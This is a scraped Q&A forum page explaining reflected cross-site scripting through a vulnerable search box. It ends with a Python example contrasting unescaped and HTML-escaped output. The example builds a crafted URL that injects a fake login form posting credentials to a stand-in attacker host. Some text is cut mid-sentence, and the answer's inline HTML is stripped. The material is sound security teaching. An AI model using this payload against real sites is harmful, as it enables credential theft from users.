What is the general concept behind XSS?

Backend | Unresolved | 5 | 1729
挽巷 2020-11-29 17:29

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enables malicious attackers to inject

5 answers
  •  一整个雨季
    2020-11-29 17:58

    I don't get how JS/VBScript can cause so much damage!

    OK. Suppose you have a site, and the site is served from http://trusted.server.com/thesite. Let's say this site has a search box, and when you search, the URL becomes: http://trusted.server.com/thesite?query=somesearchstring.

    If the site decides not to process the search string and outputs it in the result, like "Your search "somesearchstring" didn't yield any results", then anybody can inject arbitrary HTML into the site. For example:

    http://trusted.server.com/thesite?query=
    username:
    password:

    So, in this case, the site will dutifully show a fake login form on the search results page, and if the user submits it, it will send the data to the evil untrusted server. But the user doesn't see that, esp. if the URL is really long: they will just see the first bit, and assume they are dealing with trusted.server.com.

    Variations to this include injecting a
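The reflection the answer describes, as an added example (not code from the original post): a search-results template that echoes the query verbatim next to the same template with HTML escaping, fed a constructed crafted URL. The host `evil.example`, the `query` parameter handling and the helper names are assumptions for the demo.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample URL of the kind the answer describes: the search string
# carries a <form> that posts to an attacker-controlled host (placeholder).
CRAFTED_URL = (
    "http://trusted.server.com/thesite?query="
    "%3Cform%20action%3D%22http%3A%2F%2Fevil.example%2Fcollect%22%3E"
    "username%3A%20%3Cinput%20name%3Du%3E%20"
    "password%3A%20%3Cinput%20name%3Dp%3E%3C%2Fform%3E"
)


def query_from_url(url: str) -> str:
    """Pull the 'query' parameter out of the URL, percent-decoded, as the search page would."""
    params = parse_qs(urlsplit(url).query)
    return params.get("query", [""])[0]


def render_vulnerable(query: str) -> str:
    """Reflects the search string as-is: any markup in it becomes part of the page."""
    return f'<p>Your search "{query}" did not yield any results</p>'


def render_fixed(query: str) -> str:
    """Same template, but the untrusted value is HTML-escaped before it reaches the output."""
    return f'<p>Your search "{html.escape(query, quote=True)}" did not yield any results</p>'


def contains_injected_markup(page: str) -> bool:
    """Crude review check: any tag other than the template's own <p> means input became markup."""
    tags = re.findall(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)", page)
    return any(t.lower() != "p" for t in tags)


if __name__ == "__main__":
    q = query_from_url(CRAFTED_URL)
    print("vulnerable page injected:", contains_injected_markup(render_vulnerable(q)))
    print("fixed page injected:     ", contains_injected_markup(render_fixed(q)))
```

`html.escape` is the right fix for the HTML-body and attribute-value contexts shown here; a value reflected into a script block or URL needs the encoding appropriate to that context instead.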
